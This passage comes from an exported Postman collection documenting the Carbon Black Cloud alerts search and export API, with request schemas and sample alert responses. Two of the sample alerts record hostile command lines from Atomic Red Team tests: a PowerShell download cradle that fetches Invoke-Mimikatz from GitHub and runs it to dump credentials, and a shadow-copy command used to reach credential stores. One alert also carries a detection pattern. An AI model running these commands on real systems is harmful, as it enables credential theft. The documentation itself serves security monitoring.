\"&lt;string&gt;\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      &lt;integer&gt;\n    ],\n    \"remote_is_private\": &lt;boolean&gt;,\n    \"remote_namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_alert\": &lt;boolean&gt;,\n    \"mdr_workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": &lt;boolean&gt;,\n    \"mdr_determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    }\n  },\n  \"start\": &lt;long&gt;,\n  \"rows\": &lt;long&gt;,\n  \"sort\": [\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"DESC\"\n    },\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"DESC\"\n    }\n  ]\n}\n\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","alerts","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"86f9ac30-6e32-4c8a-999d-21597bb0761d","name":"Find CB_ANALYTIC alerts - ungrouped","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"time_range\": {\n        \"range\": \"-1d\"\n    },\n    \"criteria\": {\n        \"type\": [\n            \"CB_ANALYTICS\"\n        ],\n        \"minimum_severity\": \"1\"\n    },\n    \"start\": \"1\",\n    \"rows\": \"2\",\n    \"sort\": [\n        {\n            \"field\": \"backend_timestamp\",\n            \"order\": \"ASC\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 14 Apr 2023 21:48:44 GMT"},{"key":"Content-Type","value":"application/json","description":""},{"key":"Transfer-Encoding","value":"chunked"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"results\": [\n        {\n            \"org_key\": \"ABCD1234\",\n            \"alert_url\": \"defense.conferdeploy.net/alerts?s[c][query_string]=id:3367d5d3-2de3-9ab7-bb69-5edba3d8b47a&orgKey=ABCD1234\",\n            \"id\": \"3367d5d3-2de3-9ab7-bb69-5edba3d8b47a\",\n            \"type\": \"CB_ANALYTICS\",\n            \"backend_timestamp\": \"2023-08-17T02:21:58.907Z\",\n            \"user_update_timestamp\": null,\n            \"backend_update_timestamp\": \"2023-08-17T02:49:56.547Z\",\n            \"detection_timestamp\": \"2023-08-17T02:21:14.102Z\",\n            \"first_event_timestamp\": \"2023-08-17T02:21:03.160Z\",\n            \"last_event_timestamp\": \"2023-08-17T02:48:57.761Z\",\n            \"severity\": 3,\n            \"reason\": \"The application powershell.exe invoked another application (cmd.exe) on behalf of sshd.exe. A Deny Policy Action was applied.\",\n            \"reason_code\": \"T_POL_TERM_CHILD :  (cmd.exe)\",\n            \"threat_id\": \"edfaac4387bdad2d4ce753ebee052208\",\n            \"primary_event_id\": \"9d0c86233ca811ee829609214fa5925c\",\n            \"policy_applied\": \"APPLIED\",\n            \"run_state\": \"RAN\",\n            \"sensor_action\": \"TERMINATE\",\n            \"workflow\": {\n                \"change_timestamp\": \"2023-08-17T02:21:58.907Z\",\n                \"changed_by_type\": \"SYSTEM\",\n                \"changed_by\": \"ALERT_CREATION\",\n                \"closure_reason\": \"NO_REASON\",\n                \"status\": \"OPEN\"\n            },\n            \"determination\": {\n                \"change_timestamp\": \"2023-08-17T02:21:58.907Z\",\n                \"value\": \"NONE\",\n                \"changed_by_type\": null,\n                \"changed_by\": null\n            },\n            \"tags\": null,\n            \"alert_notes_present\": false,\n            \"threat_notes_present\": false,\n            \"is_updated\": true,\n            \"device_id\": 1212123,\n            \"device_name\": \"demo_device\",\n            \"device_uem_id\": \"\",\n            \"device_target_value\": \"MEDIUM\",\n            \"device_policy\": \"default\",\n            \"device_policy_id\": 6525,\n            \"device_os\": \"WINDOWS\",\n            \"device_os_version\": \"Windows Server 2019 x64\",\n            \"device_username\": \"demo@demoorg.com\",\n            \"device_location\": \"OFFSITE\",\n            \"device_external_ip\": \"1.2.3.4\",\n            \"device_internal_ip\": \"5.6.7.8\",\n            \"mdr_alert\": false,\n            \"mdr_alert_notes_present\": false,\n            \"mdr_threat_notes_present\": false,\n            \"ttps\": [\n                \"INTERNATIONAL_SITE\",\n                \"MITRE_T1059_003_WIN_CMD_SHELL\",\n                \"RUN_CMD_SHELL\",\n                \"NETWORK_ACCESS\",\n                \"MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER\",\n                \"FILELESS\",\n                \"MITRE_T1059_001_POWERSHELL\",\n                \"POLICY_DENY\",\n                \"ACTIVE_SERVER\"\n            ],\n            \"attack_tactic\": \"TA0002\",\n            \"process_guid\": \"ABCD1234-006a07ff-00000db0-00000000-1d9d0b55d165093\",\n            \"process_pid\": 3504,\n            \"process_name\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\n            \"process_sha256\": \"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\n            \"process_md5\": \"7353f60b1739074eb17c5f4dddefe239\",\n            \"process_effective_reputation\": \"TRUSTED_WHITE_LIST\",\n            \"process_reputation\": \"TRUSTED_WHITE_LIST\",\n            \"process_cmdline\": \"\\\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\\\" -c \\\"cd c:\\\\ ; echo MYPID=$PID; Get-Date ; Invoke-AtomicTest T1003.003-8 \\\"\",\n            \"process_username\": \"KOGNOS-W19-CB-3\\\\Administrator\",\n            \"process_issuer\": [\n                \"Microsoft Windows Production PCA 2011\"\n            ],\n            \"process_publisher\": [\n                \"Microsoft Windows\"\n            ],\n            \"parent_guid\": \"ABCD1234-006a07ff-00000dd8-00000000-1d9d0b55cf5a890\",\n            \"parent_pid\": 3544,\n            \"parent_name\": \"c:\\\\windows\\\\system32\\\\openssh\\\\sshd.exe\",\n            \"parent_sha256\": \"731e8034cb953abcd0fc86400ad55113efa302f77d276213198a76065601576b\",\n            \"parent_md5\": \"\",\n            \"parent_effective_reputation\": \"TRUSTED_WHITE_LIST\",\n            \"parent_reputation\": \"TRUSTED_WHITE_LIST\",\n            \"parent_cmdline\": \"\",\n            \"parent_username\": \"KOGNOS-W19-CB-3\\\\Administrator\",\n            \"childproc_guid\": \"ABCD1234-006a07ff-00000590-00000000-1d9d0b55e8422d1\",\n            \"childproc_name\": \"c:\\\\windows\\\\system32\\\\cmd.exe\",\n            \"childproc_sha256\": \"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527\",\n            \"childproc_md5\": \"\",\n            \"childproc_effective_reputation\": \"TRUSTED_WHITE_LIST\",\n            \"childproc_username\": \"KOGNOS-W19-CB-3\\\\Administrator\",\n            \"childproc_cmdline\": \"\\\"cmd.exe\\\" /c \\\"vssadmin.exe create shadow /for=C: & mklink /D C:\\\\Temp\\\\vssstore \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy1\\\"\",\n            \"blocked_name\": \"c:\\\\windows\\\\system32\\\\cmd.exe\",\n            \"blocked_sha256\": \"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527\",\n            \"blocked_md5\": \"\",\n            \"blocked_effective_reputation\": \"TRUSTED_WHITE_LIST\"\n        }"},{"id":"a8a3ba3b-c70e-45b8-9a35-ffbb5015a289","name":"Find WATCHLIST alerts - ungrouped","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"time_range\": {\n        \"range\": \"-2w\"\n    },\n    \"criteria\": {\n        \"minimum_severity\": 2,\n        \"device_os\": [\n            \"WINDOWS\"\n        ],\n        \"type\": [\n            \"WATCHLIST\"\n        ]\n    },\n    \"exclusions\": {\n        \"device_os_version\": [\n            \"Windows 10 x64\"\n        ]\n    },\n    \"start\": \"1\",\n    \"rows\": \"1\",\n    \"sort\": [\n        {\n            \"field\": \"severity\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 14 Apr 2023 22:00:28 GMT"},{"key":"Content-Type","value":"application/json","description":""},{"key":"Transfer-Encoding","value":"chunked"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"results\": [\n        {\n            \"org_key\": \"ABCD1234\",\n            \"alert_url\": \"defense.conferdeploy.net/alerts?s[c][query_string]=id:1c3fa0b1-36fe-4641-9f87-95128bef94eb&orgKey=ABCD1234\",\n            \"id\": \"1c3fa0b1-36fe-4641-9f87-95128bef94eb\",\n            \"type\": \"WATCHLIST\",\n            \"backend_timestamp\": \"2023-08-06T13:33:47.411Z\",\n            \"user_update_timestamp\": null,\n            \"backend_update_timestamp\": \"2023-08-06T13:33:47.411Z\",\n            \"detection_timestamp\": \"2023-08-06T13:32:59.205Z\",\n            \"first_event_timestamp\": \"2023-08-06T13:30:17.713Z\",\n            \"last_event_timestamp\": \"2023-08-06T13:30:17.713Z\",\n            \"severity\": 10,\n            \"reason\": \"Process powershell.exe was detected by the report \\\"Execution - AMSI - .Net Loading Suspicious Content Into Memory\\\" in watchlist \\\"AMSI Threat Intelligence\\\"\",\n            \"reason_code\": \"0f6918d8-98c5-3ed9-9786-b8c6094eeb78:8c25935c-f78b-3ed3-b29e-4ce9c2a42ba0\",\n            \"threat_id\": \"0F6918D898C58ED9D786B8C6094EEB78\",\n            \"primary_event_id\": \"DHeFhEvUQCerOi2CvDbWUA-0\",\n            \"policy_applied\": \"NOT_APPLIED\",\n            \"run_state\": \"RAN\",\n            \"sensor_action\": \"ALLOW\",\n            \"workflow\": {\n                \"change_timestamp\": \"2023-08-06T13:33:47.411Z\",\n                \"changed_by_type\": \"SYSTEM\",\n                \"changed_by\": \"ALERT_CREATION\",\n                \"closure_reason\": \"NO_REASON\",\n                \"status\": \"OPEN\"\n            },\n            \"determination\": {\n                \"change_timestamp\": \"2023-08-06T13:33:47.411Z\",\n                \"value\": \"NONE\",\n                \"changed_by_type\": null,\n                \"changed_by\": null\n            },\n            \"tags\": null,\n            \"alert_notes_present\": false,\n            \"threat_notes_present\": false,\n            \"is_updated\": false,\n            \"device_id\": 1212123,\n            \"device_name\": \"demo_machine\",\n            \"device_uem_id\": \"\",\n            \"device_target_value\": \"MEDIUM\",\n            \"device_policy\": \"default\",\n            \"device_policy_id\": 6525,\n            \"device_os\": \"WINDOWS\",\n            \"device_os_version\": \"Windows Server 2019 x64\",\n            \"device_username\": \"demo@demoorg.com\",\n            \"device_location\": \"UNKNOWN\",\n            \"device_external_ip\": \"1.2.3.4\",\n            \"device_internal_ip\": \"5.6.7.8\",\n            \"mdr_alert\": false,\n            \"mdr_alert_notes_present\": false,\n            \"mdr_threat_notes_present\": false,\n            \"report_id\": \"LrKOC7DtQbm4g8w0UFruQg-5f8518fb-3981-44ce-8ab7-b4a4240d50e0\",\n            \"report_name\": \"Execution - AMSI - .Net Loading Suspicious Content Into Memory\",\n            \"report_description\": \"An attacker can leverage PowerShell's built-in abilities to access the .Net subsystem in Windows to load arbitrary code into memory. This is a common technique that is used to evade on-host AV scanning by never writing a file to disk and executing payloads directly in memory. You should take immediate action if responding to this alert.\",\n            \"report_tags\": [\n                \"evasion\",\n                \"t1106\",\n                \"t1059\",\n                \"windows\",\n                \"amsi\",\n                \"attack\",\n                \"attackframework\"\n            ],\n            \"report_link\": \"https://attack.mitre.org/techniques/T1106/\",\n            \"ioc_id\": \"5f8518fb-3981-44ce-8ab7-b4a4240d50e0\",\n            \"ioc_hit\": \"fileless_scriptload_cmdline:\\\"[System.Runtime.InteropServices.Marshal]::Copy\\\" OR scriptload_content:\\\"[System.Runtime.InteropServices.Marshal]::Copy\\\"\",\n            \"watchlists\": [\n                {\n                    \"id\": \"Ci7w5B4URg6HN60hatQMQ\",\n                    \"name\": \"AMSI Threat Intelligence\"\n                }\n            ],\n            \"process_guid\": \"ABCD1234-006a07ff-00000540-00000000-1d9c86a2286f3bc\",\n            \"process_pid\": 1344,\n            \"process_name\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\n            \"process_sha256\": \"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\n            \"process_md5\": \"7353f60b1739074eb17c5f4dddefe239\",\n            \"process_effective_reputation\": \"TRUSTED_WHITE_LIST\",\n            \"process_reputation\": \"TRUSTED_WHITE_LIST\",\n            \"process_cmdline\": \"\\\"powershell.exe\\\" & {IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds}\",\n            \"process_username\": \"KOGNOS-W19-CB-3\\\\Administrator\",\n            \"process_issuer\": [\n                \"Microsoft Windows Production PCA 2011\"\n            ],\n            \"process_publisher\": [\n                \"Microsoft Windows\"\n            ],\n            \"parent_guid\": \"ABCD1234-006a07ff-00000dbc-00000000-1d9c86a210c4ece\",\n            \"parent_pid\": 3516,\n            \"parent_name\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\n            \"parent_sha256\": \"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\n            \"parent_md5\": \"7353f60b1739074eb17c5f4dddefe239\",\n            \"parent_effective_reputation\": \"TRUSTED_WHITE_LIST\",\n            \"parent_reputation\": \"TRUSTED_WHITE_LIST\",\n            \"parent_cmdline\": \"\\\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\\\" -c \\\"cd c:\\\\ ; echo MYPID=$PID; Get-Date ; Invoke-AtomicTest T1003.001-10 \\\"\",\n            \"parent_username\": \"KOGNOS-W19-CB-3\\\\Administrator\",\n            \"childproc_guid\": \"\",\n            \"childproc_username\": \"\",\n            \"childproc_cmdline\": \"\",\n            \"ml_classification_final_verdict\": \"NOT_ANOMALOUS\",\n            \"ml_classification_global_prevalence\": \"MEDIUM\",\n            \"ml_classification_org_prevalence\": \"LOW\"\n        }\n    ],\n    \"num_found\": 10995,\n    \"num_available\": 10000\n}"}],"_postman_id":"60ac4701-4cf3-42ee-9205-0c3bd673fe2a"},{"name":"Export Alerts","id":"52b22f98-a26d-43e8-b10d-99af42c1b4a0","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"time_range\": {\n        \"range\": \"-1d\"\n    },\n    \"criteria\": {\n        \"minimum_severity\": 2,\n        \"type\": [\"WATCHLIST\"]\n    },\n    \"format\": \"CSV\"\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_export","description":"<p>Export Alerts in csv format. This is an asynchronous request which enables up to 25,000 records to be exported in each request.</p>\n<ol>\n<li><p>Use the Export Alerts endpoint defined here to create a job with required search criteria to limit the results. A job_id is returned.</p>\n<ol>\n<li>This job may take up to 5 minutes to complete.</li>\n</ol>\n</li>\n<li><p>Optionally, use Get Job Progress to check whether the job has completed.</p>\n</li>\n<li><p>Use the job_id in the Download Job Output endpoint in the Jobs Service to get the results. The Download Job API requires the permission jobs.status - READ.</p>\n<ol>\n<li>If more than 25,000 records matched the criteria, the first 25,000 are returned, sorted by backend_timestamp.</li>\n</ol>\n</li>\n</ol>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/#export-alerts\">See Documentation</a></p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>READ</td>\n</tr>\n<tr>\n<td>jobs.status</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"query\": \"&lt;string&gt;\",\n  \"time_range\": {\n    \"start\": \"&lt;dateTime&gt;\",\n    \"end\": \"&lt;dateTime&gt;\",\n    \"range\": \"&lt;string&gt;\"\n  },\n  \"criteria\": {\n    \"org_key\": [\n      \"&lt;string&gt;\"\n    ],\n    \"id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"alert_origin\": [\n      \"&lt;string&gt;\"\n    ]\n    \"minimum_severity\": &lt;integer&gt;,\n    \"reason_code\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"&lt;string&gt;\"\n    ],\n    \"run_state\": [\n      \"&lt;string&gt;\"\n    ],\n    \"sensor_action\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": &lt;boolean&gt;,\n    \"threat_notes_present\": &lt;boolean&gt;,\n    \"device_id\": [\n      &lt;long&gt;\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      &lt;long&gt;\n    ],\n    \"device_target_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      &lt;integer&gt;\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      &lt;integer&gt;\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_reputation\": [\n      \"ADWARE\",\n      \"NOT_SUPPORTED\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_local_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\"\n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      &lt;integer&gt;\n    ],\n    \"remote_is_private\": &lt;boolean&gt;,\n    \"remote_namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_alert\": &lt;boolean&gt;,\n    \"mdr_workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": &lt;boolean&gt;,\n    \"mdr_determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    }\n 